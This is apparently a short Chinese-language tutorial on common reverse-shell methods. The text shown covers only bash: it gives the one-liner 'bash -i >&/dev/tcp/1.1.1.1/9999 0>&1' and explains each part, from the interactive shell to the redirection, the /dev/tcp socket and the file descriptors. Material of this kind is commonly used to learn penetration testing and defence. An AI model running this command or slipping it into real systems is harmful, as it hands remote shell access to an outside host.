常用反弹shell方法总结
文章目录
前言
bash反弹shell
bash -i >&/dev/tcp/1.1.1.1/9999 0>&1
解释:
bash -i [interface] 表示启动shell窗口
(>)表示将这个窗口重定向到指定的地方,也就是将输出交给后面
&表示将该命令转到后台执行 (我看其他文章也有将&解释成等同于的,如2>&1 就表示stderr标准错误重定向为等同于stdout标准输出)
/dev/tcp/x.x.x.x/port表示发出一个socket调用,建立一个socket连接,读写这个文件等同于socket连接中传输数据.x.x.x.x表示要反弹到的主机的ip,port为端口 (同理linux中还存在/dev/udp)
0表示stdin标准输入
1表示stdout标准输出
2表示stderr标准错误输出
0>&1表示将标准输入重定向到标准输出